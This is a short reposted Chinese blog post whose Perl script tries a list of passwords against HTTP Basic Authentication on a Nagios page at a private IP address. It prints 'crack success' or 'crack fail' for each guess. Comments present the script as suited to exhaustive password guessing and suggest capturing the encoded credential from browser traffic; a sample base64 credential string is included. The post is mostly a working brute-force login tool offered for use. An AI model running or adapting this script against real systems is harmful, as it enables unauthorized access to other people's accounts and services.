Perl脚本Basic Authentication方法
- #!/usr/bin/perl
-
- use strict;
- use warnings;
- use HTTP::Request;
- use LWP::UserAgent;
- use Data::Dumper;
- use Getopt::Std;
-
- my %options = ();
- getopt("d:",\%options);
-
- my $debug = $options{d} || 0;
-
- my @password_array = qw(ken jack sunny ben kick);
-
- &main(@password_array);
-
-
-
- sub main {
- foreach my $password (@_) {
- my $status = &get_url($password);
- if ($status == 1) {
- last;
- }
- }
- }
-
-
- sub get_url {
- my $password = shift;
-
- my $ua;
- my $req;
- my $res;
-
- my $url = 'http://192.168.4.40:8010/nagios';
-
- $ua = LWP::UserAgent->new;
- $ua->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1) Gecko/20070309 Firefox/2.0.0.3');
- $ua->timeout(5);
-
- $req = HTTP::Request->new( GET => $url );
- #方法1:使用Firefox登陆这个Url输入用户密码时抓包,将密文抓下来。贴在下面
- #$req->header("Authorization" => 'Basic bW9ua3R4cep1Y3dlYl9tb25pdG9y');
- #方法2:可以直接输入用户名和密码,适合进行穷举时使用
- $req->authorization_basic('admin', $password);
-
- $res = $ua->request($req);
- print "************************** content begin **************************\n" if $debug;
- print $res->content . "\n" if $debug;
- print "************************** content end **************************\n" if $debug;
-
- print '*************************** Dumper $res ***************************' . "\n" if $debug;
- print Dumper $res if $debug;
- print '*************************** Dumper $res ***************************' . "\n" if $debug;
-
- if ($res->is_success) {
- print "crack success,password: " . $password . "\n";
- return 1;
- } else {
- print "crack fail,password: " . $password . "\n";
- return 0;
- }
- }
本文转自fine102 51CTO博客,原文链接:http://blog.51cto.com/gzmaster/396643,如需转载请自行联系原作者